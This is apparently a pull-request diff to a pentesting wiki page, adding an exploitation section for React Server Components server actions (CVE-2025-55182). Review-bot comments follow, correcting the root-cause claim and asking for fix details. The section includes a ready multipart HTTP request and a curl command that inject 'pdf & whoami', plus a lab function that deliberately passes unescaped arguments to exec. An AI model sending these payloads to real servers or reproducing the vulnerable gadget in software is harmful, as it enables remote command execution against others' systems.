diff --git a/src/pentesting-web/deserialization/README.md b/src/pentesting-web/deserialization/README.md index 85700bee5b1..5a25da381b7 100644 --- a/src/pentesting-web/deserialization/README.md +++ b/src/pentesting-web/deserialization/README.md 
@@ -397,6 +397,62 @@ In the following pages you can find information about how to abuse this library - [https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/](https://www.acunetix.com/blog/web-security-zone/deserialization-vulnerabilities-attacking-deserialization-in-js/) - [https://hackerone.com/reports/350418](https://hackerone.com/reports/350418) +### React Server Components / react-server-dom-webpack Server Actions Abuse (CVE-2025-55182) + +React Server Components (RSC) rely on `react-server-dom-webpack` (RSDW) to decode server action submissions that are sent as `multipart/form-data`. Each action submission contains: + +- `$ACTION_REF_` parts that reference the action being invoked. +- `$ACTION_:` parts whose body is JSON such as `{"id":"module-path#export","bound":[arg0,arg1,...]}`. + +In version **19.2.0** the `decodeAction(formData, serverManifest)` helper blindly trusts both the **`id` string** (selecting which module export to call) and the **`bound` array** (the arguments). If an attacker can reach the endpoint that forwards requests to `decodeAction`, they can invoke any exported server action with attacker-controlled parameters even without a React front-end (CVE-2025-55182). The end-to-end recipe is: + +1. **Learn the action identifier.** Bundle output, error traces or leaked manifests typically reveal strings like `app/server-actions#generateReport`. +2. **Recreate the multipart payload.** Craft a `$ACTION_REF_0` part and a `$ACTION_0:0` JSON body carrying the identifier and arbitrary arguments. +3. **Let `decodeAction` dispatch it.** The helper resolves the module from `serverManifest`, imports the export, and returns a callable that the server immediately executes. 
+ +Example payload hitting `/formaction`: + +```http +POST /formaction HTTP/1.1 +Host: target +Content-Type: multipart/form-data; boundary=----BOUNDARY + +------BOUNDARY +Content-Disposition: form-data; name="$ACTION_REF_0" + +------BOUNDARY +Content-Disposition: form-data; name="$ACTION_0:0" + +{"id":"app/server-actions#generateReport","bound":["acme","pdf & whoami"]} +------BOUNDARY-- +``` + +Or with curl: + +```bash +curl -sk -X POST http://target/formaction \ + -F '$ACTION_REF_0=' \ + -F '$ACTION_0:0={"id":"app/server-actions#generateReport","bound":["acme","pdf & whoami"]}' +``` + +The `bound` array directly populates the server-action parameters. In the vulnerable lab the gadget looks like: + +```javascript +const { exec } = require("child_process"); +const util = require("util"); +const pexec = util.promisify(exec); + +async function generateReport(project, format) { + const cmd = `node ./scripts/report.js --project=${project} --format=${format}`; + const { stdout } = await pexec(cmd); + return stdout; +} +``` + +Supplying `format = "pdf & whoami"` makes `/bin/sh -c` run the legitimate report generator and then `whoami`, with both outputs delivered inside the JSON action response. Any server action that wraps filesystem primitives, database drivers or other interpreters can be abused the same way once the attacker controls the `bound` data. + +An attacker never needs a real React client—any HTTP tool that emits the `$ACTION_*` multipart shape can directly call server actions and chain the resulting JSON output into an RCE primitive. + ## Java - HTTP In Java, **deserialization callbacks are executed during the process of deserialization**. This execution can be exploited by attackers who craft malicious payloads that trigger these callbacks, leading to potential execution of harmful actions. 
@@ -1193,5 +1249,6 @@ Industrialized gadget discovery: - watchTowr Labs – Is This Bad? This Feels Bad — GoAnywhere CVE-2025-10035: https://labs.watchtowr.com/is-this-bad-this-feels-bad-goanywhere-cve-2025-10035/ - [OffSec – CVE-2025-59287 WSUS unsafe deserialization (blog)](https://www.offsec.com/blog/recent-vulnerabilities-in-redis-servers-lua-scripting-engine-2/) - [PoC – tecxx/CVE-2025-59287-WSUS](https://github.com/tecxx/CVE-2025-59287-WSUS) +- [RSC Report Lab – CVE-2025-55182 (React 19.2.0)](https://github.com/ghe770mvp/RSC_Vuln_Lab) {{#include ../../banners/hacktricks-training.md}}
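Review bot: In the first hunk (the new `### React Server Components / react-server-dom-webpack Server Actions Abuse (CVE-2025-55182)` section), the RCE conclusion is pinned on the wrong bug: what `decodeAction` trusting `id` and `bound` gives is the ability to call any exported server action with chosen arguments, while the `whoami` execution comes from the lab's own command-injection gadget, which interpolates `project` and `format` unescaped into `` `node ./scripts/report.js --project=${project} --format=${format}` `` and hands the string to `exec`. The closing sentence ("... chain the resulting JSON output into an RCE primitive") should instead say that impact depends on what the reachable actions do, which the paragraph before it already implies ("Any server action that wraps filesystem primitives, database drivers or other interpreters can be abused the same way"). Two documentation gaps while you are there: the affected-version statement is only "In version **19.2.0**", with no word on whether earlier releases are affected or which release fixes it, and there is no fix/mitigation line at all; add the patched version if known (or say it is unknown) and the defensive takeaway that a server action must treat every element of `bound` as untrusted input and must not build shell commands from it, since `decodeAction` performs no such validation.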
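Review bot: In the second hunk, the only new reference, `- [RSC Report Lab – CVE-2025-55182 (React 19.2.0)](https://github.com/ghe770mvp/RSC_Vuln_Lab)`, is a third-party lab repository rather than an advisory, so nothing in the list lets a reader verify the affected versions or the fix; add the upstream advisory for CVE-2025-55182 (React release notes or the GitHub/npm security advisory, whichever exists, as no URL is given in this patch) next to it, mirroring the PoC-plus-blog pairing used for the WSUS entry. Also visible in this hunk's context lines, although not changed by the PR: the entry `[OffSec – CVE-2025-59287 WSUS unsafe deserialization (blog)]` points at `https://www.offsec.com/blog/recent-vulnerabilities-in-redis-servers-lua-scripting-engine-2/`, whose slug describes a Redis Lua-scripting post, so either the link text or the URL is wrong and is worth correcting in the same PR.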